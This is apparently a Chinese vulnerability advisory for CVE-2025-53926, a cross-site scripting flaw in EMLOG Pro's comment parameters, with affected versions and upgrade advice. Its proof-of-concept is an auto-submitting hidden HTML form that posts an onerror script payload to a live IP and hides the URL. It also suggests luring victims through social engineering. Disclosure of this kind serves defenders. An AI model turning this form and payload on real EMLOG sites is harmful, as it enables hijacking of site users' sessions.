EMLOG Pro 2.5.17跨站点脚本漏洞CVE-2025-53926
EMLOG是一款轻量级开源博客和CMS建站系统,速度快、省资源、易上手,适合各种规模的站点搭建,该软件是基于PHP+MySQL开发。
一、基本情况
EMLOG Pro 2.5.17版本发布于2025年06月29日,增加获取草稿详情和草稿列表接口和文章审核挂载点,优化应用商店体验如自动加载等。
栋科技漏洞库关注到EMLOG Pro 2.5.17及之前版本中,由于错误而存储的跨站点脚本漏洞,被追踪为CVE-2025-53926,CVSS评分6.1。
二、漏洞分析
CVE-2025-53926是EMLOG Pro受影响版本的跨站点脚本漏洞,远程攻击者可通过comment和comname参数注入任意web脚本或HTML。
具体而言,该漏洞是由于错误错误而存储的跨站点脚本(XSS)漏洞,漏洞被利用前提是受害者发送帖子请求,即被说服点击发送的URL。
三、POC概念验证
1、为了利用该漏洞,说服受害者访问准备好的网站,例如使用社交工程。
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://91.99.136.120/emlog/index.php?action=addcom" method="POST">
<input type="hidden" name="gid" value="1" />
<input type="hidden" name="comment" value="'"><h1>abc<img src=x onerror=alert(document.domain)></h1>${{33-11}}<'"" />
<input type="hidden" name="comname" value="abc'"><h1>abc</h1>${{33-11}}<'"" />
<input type="hidden" name="commail" value="abc@cba.pl" />
<input type="hidden" name="pid" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2、受害者被重定向,恶意JS代码被执行
四、影响范围
EMLOG Pro <= 2.5.17
五、修复建议
EMLOG Pro >= 2.5.18
六、参考链接
